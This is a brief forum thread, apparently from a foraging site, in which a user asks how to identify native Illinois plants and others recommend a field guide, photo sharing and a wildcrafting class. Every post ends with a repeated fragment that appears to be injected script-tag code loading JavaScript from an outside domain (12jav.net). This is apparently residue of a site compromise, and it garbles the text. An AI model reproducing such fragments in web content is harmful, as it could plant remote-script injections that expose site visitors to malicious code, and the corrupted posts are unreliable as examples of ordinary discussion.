Anyone have a link that they can post that will help me identify herbs/plants here in Illinois? It would be VERY useful. I have only found a few plants that I know exactly what they are, blackberry bushes, Oaks, sycamore, etc. But I seem to lack the knowledge of the lower lying foliage. Native of Illinois all my life, and don't know my own plants, heheh. I am ashamed. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I am not sure about links but I know that the book "edible plants of north america" had pretty good descriptions and pictures. If you can load pictures on your photos page I might be able to identify a few, and so may some others here. That or search native foliage of illinoise. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I recommend taking a Wildcrafting class in one of the community colleges or forest preserve associations. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
